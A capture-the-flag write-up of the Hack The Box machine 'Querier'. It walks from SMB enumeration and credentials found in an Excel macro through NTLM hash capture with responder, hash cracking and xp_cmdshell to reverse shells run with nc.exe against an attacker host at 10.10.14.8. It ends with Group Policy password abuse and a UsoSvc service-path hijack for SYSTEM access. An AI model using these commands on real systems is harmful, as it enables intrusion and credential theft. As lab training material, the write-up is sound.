Querier Writeup
06 May 2023 #CTF #HTB #box #medium #windows
Enumeration
nmap
$ sudo nmap -sC -sV 10.10.10.125
[...]
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-05-06T15:18:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-06T15:04:38
| Not valid after: 2053-05-06T15:04:38
| MD5: 78b041938cf45306d13a118c01f8e0fd
|_SHA-1: 0891cf4987dddbfd7f07211707db9c7da051a800
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-05-06T15:18:18
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
[...]
SMB
Let's see if we can list shares anonymously:
$ smbclient -NL 10.10.10.125
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is this 'Reports' share which is not default:
$ smbclient -N //10.10.10.125/Reports
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jan 29 00:23:48 2019
.. D 0 Tue Jan 29 00:23:48 2019
Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
smb: \> get "Currency Volume Report.xlsm"
Only 1 file on here, which is a Microsoft Excel document. The .xlsm extension suggests that macros are enabled.
Macro Analysis
We can run exiftool to confirm that this is indeed a macro enabled document:
$ exiftool 'Currency Volume Report.xlsm'
[...]
MIME Type : application/vnd.ms-excel.sheet.macroEnabled.12
Creator : Luis
Last Modified By : Luis
[...]
We also get a potential username.
We'll use olevba from oletools to extract the macros from this document:
$ olevba 'Currency Volume Report.xlsm'
[...]
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
[...]
There is a database connection string in this macro with credentials used to access the MSSQL database we saw was open on port 1433.
MSSQL
Let's use impacket's mssqlclient to access the DB:
$ impacket-mssqlclient -windows-auth 'reporting:PcwTWTHRwryjc$c6@QUERIER'
We must use the -windows-auth flag in order to authenticate with the Windows account rather than a DB only account.
Let's take a look at the databases we have access to:
SQL> select name from sys.databases
name
-----------------------------------------------------------
master
tempdb
model
msdb
volume
Only this volume database is non-default. Let's see if it has any tables:
SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> select table_name from information_schema.tables
table_name
-----------------------------------------------------------
Looks like it's completely empty.
We should also check if we are a db admin (so that we can run commands):
SQL> select IS_SRVROLEMEMBER('sysadmin')
-----------
0
But we are not.
Foothold
Steal Hash
Another thing we can try is to make the DB authenticate to our box in order to crack its password. We'll use responder to do that:
$ sudo responder -I tun0
[...]
Now use the xp_dirtree command to list files inside of our fake share:
SQL> xp_dirtree '\\10.10.14.8\asdf\asdf'
The share name and file name don't matter, we can put anything here.
We see the challenge response instantly in responder:
[SMB] NTLMv2-SSP Client : 10.10.10.125
[SMB] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMB] NTLMv2-SSP Hash : mssql-svc::QUERIER:41586128dc6fe487:D6CA022726EB8A90BB6F01847EC4DDB5:0101000000000000001F6FEBE380D9010445F82672EEA3460000000002000800570043003900580001001E00570049004E002D003000420051004200450032005300330051004300450004003400570049004E002D00300042005100420045003200530033005100430045002E0057004300390058002E004C004F00430041004C000300140057004300390058002E004C004F00430041004C000500140057004300390058002E004C004F00430041004C0007000800001F6FEBE380D90106000400020000000800300030000000000000000000000000300000AEDB4694C82FFF306151BA2E748FD745CC843DB122E0674079741A67221E2BAD0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000
Copy this to a file and throw it to hashcat:
$ hashcat hash.txt /usr/share/wordlists/rockyou.txt
[...]
MSSQL-SVC::QUERIER:41586128dc6fe487:[...]:corporate568
[...]
Abuse Service Account
Let's login again with our new account:
impacket-mssqlclient 'mssql-svc:corporate568@QUERIER' -windows-auth
Again, -windows-auth to use the local Windows account.
Let's once again check the access level:
SQL> select is_srvrolemember('sysadmin')
-----------
1
This time we have sysadmin privileges (not surprising since this is the MSSQL service account).
This means we can use xp_cmdshell to execute commands on the server. But first we need to enable it. Impacket's mssqlclient has a special command for that purpose:
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
Now that it is enabled, we can use it:
SQL> xp_cmdshell whoami
output
----------------------------------------------------------
querier\mssql-svc
NULL
To get a reverse shell, we'll use nc.exe (you can get it from here) which will be hosted on a SMB share using impacket's smbserver:
$ impacket-smbserver -smb2support -username asdf -password asdf public /opt/drop
[...]
/opt/drop is the directory where I store all tools that I might want to transfer.
Let's authenticate to our share:
SQL> xp_cmdshell net use \\10.10.14.8\public /user:asdf asdf
output
--------------------------------------------------------------------------------
The command completed successfully.
NULL
Now we can execute nc.exe from that share:
SQL> xp_cmdshell \\10.10.14.8\public\nc.exe 10.10.14.8 443 -e cmd.exe
Privesc
Running a privesc script like winpeas gives some interesting results:
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Found C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
Found C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
UserName: Administrator
NewName: [BLANK]
cPassword: MyUnclesAreMarioAndLuigi!!1!
Changed: 2019-01-28 23:12:48
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
UsoSvc: AllAccess, Start
It found a password for the Administrator account in Group Policy Preference files. The password is actually encrypted but Microsoft published the AES key used to encrypt/decrypt these passwords (they do be like that sometimes):
$ evil-winrm -i 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
[...]
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
querier\administrator
We can also use psexec or wmiexec of course.
Interestingly, my crackmapexec (version 5.4.0 from Kali repos) didn't work with these creds:
$ crackmapexec winrm 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB 10.10.10.125 5985 QUERIER [*] Windows 10.0 Build 17763 (name:QUERIER) (domain:HTB.LOCAL)
HTTP 10.10.10.125 5985 QUERIER [*] http://10.10.10.125:5985/wsman
WINRM 10.10.10.125 5985 QUERIER [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1!
$ crackmapexec smb 10.10.10.125 -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!'
SMB 10.10.10.125 445 QUERIER [*] Windows 10.0 Build 17763 x64 (name:QUERIER) (domain:HTB.LOCAL) (signing:False) (SMBv1:False)
SMB 10.10.10.125 445 QUERIER [-] HTB.LOCAL\administrator:MyUnclesAreMarioAndLuigi!!1! STATUS_NO_LOGON_SERVERS
Not sure why.
We also have full access to the UsoSvc service:
C:\>sc qc UsoSvc
sc qc UsoSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.exe -k netsvcs -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
We see that it runs as SYSTEM. To exploit this, we have to modify the binary path to execute nc.exe and restart it to get a reverse shell.
C:\>copy \\10.10.14.8\public\nc.exe C:\ProgramData\nc.exe
C:\>sc.exe config UsoSvc binPath= "cmd.exe /c C:\ProgramData\nc.exe 10.10.14.8 1337 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\>sc.exe stop UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 30 WIN32
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x3
WAIT_HINT : 0x7530
C:\>sc.exe start UsoSvc
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
I couldn't find a way to make it execute nc.exe from our SMB share so I had to copy it to the box.
We get our shell right away:
C:\Windows\system32>whoami
nt authority\system
It's always a good idea to restore the service to its original state after exploiting it.
Key Takeaways
- Use
olevbato extract macros from Office documents - Always try to steal the hash of the DB service account
- Don't trust only 1 tool